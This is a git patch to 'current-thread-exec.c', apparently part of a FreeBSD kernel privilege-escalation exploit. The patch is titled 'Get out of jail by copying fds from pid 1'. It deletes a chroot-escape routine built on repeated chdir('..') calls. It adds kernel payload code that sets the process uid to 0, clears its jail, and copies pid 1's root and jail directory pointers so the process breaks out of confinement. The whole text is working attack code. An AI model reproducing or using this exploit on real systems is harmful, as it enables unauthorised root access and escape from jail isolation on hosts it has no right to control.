From 4c9211d7f685f873aa3ce5796c0f4e63e6b50ddd Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 27 Feb 2011 03:47:07 -0500
Subject: Get out of jail by copying fds from pid 1.

---
 current-thread-exec.c | 72 ++++++++-------------------------------------------
 1 file changed, 11 insertions(+), 61 deletions(-)

diff --git a/current-thread-exec.c b/current-thread-exec.c
index 01f9acc..373f74f 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -7,6 +7,8 @@
 #include <sys/mman.h>
 #include <sys/socket.h>
 #include <sys/stat.h>
+#include <sys/filedesc.h>
+#include <sys/queue.h>
 #include <netgraph/ng_socket.h>
 #include <stdio.h>
 #include <fcntl.h>
@@ -14,64 +16,6 @@
 
 #define PAGES 1
 
-int leavejail(void)
-{
-	int fail = 0;
-	int val = 2;
-	struct stat dirinfo;
-	ino_t chroot_root;
-	if (stat("/", &dirinfo) < 0) {
-		perror("\t[-] couldn't stat /");
-		goto die;
-	}
-	chroot_root = dirinfo.st_ino;
-	if (sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)) < 0) {
-		perror("\t[-] couldn't change sysctl");
-		goto die;
-	}
-	mkdir("temp_dir", 0755);
-	int fd = open(".", O_RDONLY);
-	if (fd < 0) {
-		perror("\t[-] couldn't open this directory");
-		goto die;
-	}
-	if (chroot("temp_dir") < 0) {
-		perror("\t[-] couldn't chroot to temp_dir");
-		goto die;
-	}
-	if (fchdir(fd) < 0) {
-		perror("\t[-] couldn't change to fd");
-		goto die;
-	}
-	close(fd);
-	int i;
-	for (i = 0; i < 1024; ++i) {
-		if (chdir("..") < 0) {
-			perror("\t[-] couldn't chdir backwards");
-			goto die;
-		}
-	}
-	if (chroot(".") < 0) {
-		perror("\t[-] couldn't obtain final chroot");
-		goto die;
-	}
-	if (stat("/", &dirinfo) < 0) {
-		perror("\t[-] couldn't stat new /");
-		goto die;
-	}
-	if (dirinfo.st_ino == chroot_root) {
-		fprintf(stderr, "\t[-] new root is the same as old root\n");
-		goto die;
-	}
-end:
-	val = 0;
-	sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val));
-	return fail;
-die:
-	close(fd);
-	fail = 1;
-	goto end;
-}
 
 volatile int got_root = 0;
 int root(void)
@@ -84,6 +28,15 @@ int root(void)
 	thread->td_critnest = 0;
 	thread->td_proc->p_ucred->cr_uid = 0;
 	thread->td_proc->p_ucred->cr_prison = NULL;
+
+	struct proc *parent = thread->td_proc;
+	while (parent->p_pptr && parent->p_pid != 1)
+		parent = parent->p_pptr;
+	thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir;
+	thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir;
+	thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir;
+	thread->td_proc->p_pptr = parent;
+
 	got_root = 1;
 	return 0;
 }
@@ -123,9 +76,6 @@ int main(int argc, char *argv[])
 	fprintf(stderr, "[+] elevating permissions\n");
 	setuid(0);	
 	setgid(0);
-	fprintf(stderr, "[+] attempting to leave jail...\n");
-	if (leavejail())
-		fprintf(stderr, "[-] failed to leave jail\n");
 	if (getuid() != 0) {
 		fprintf(stderr, "[-] failed to get root\n");
 		return -1;
-- 
cgit v1.2.3-59-g8ed1b